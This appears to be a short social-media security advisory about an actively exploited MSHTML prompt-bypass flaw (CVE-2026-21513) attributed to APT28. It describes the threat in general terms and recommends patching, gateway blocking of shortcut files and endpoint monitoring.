State-sponsored actors are using browser bypasses to drop silent implants. π
CVE-2026-21513 Β· Severity 8.8 Β· Active Zero-Day Exploitation of MSHTML Framework.
Reports from the last 24 hours link the Russia-based APT28 group to the active exploitation of a high-severity bypass in the MSHTML (browser) framework. This flaw allows an attacker to bypass security prompts when executing files on @[Microsoft](urn:li:organization:1035) systems via malicious HTML or shortcut (.lnk) files.
Attackers are delivering these files via email and hijacked links to install specialized implants for data collection. This bypass is particularly dangerous because it neutralizes the built-in warnings that users rely on to distinguish safe content from malicious payloads.
The uncomfortable truth: Your users are being targeted with links that download and execute malware the moment they are viewed, even if they never click Accept.
β Apply the latest security updates to all Windows endpoints to patch the MSHTML framework.
β Block the download or execution of untrusted .LNK and .URL files at the email gateway.
β Monitor endpoint telemetry for unauthorized shell executions originating from browser processes.
Does your current endpoint protection detect malicious scripts that execute without a user prompt? π
#Cybersecurity #Infosec #ThreatIntelligence #PatchManagement #SecurityLeadership #CodeDefence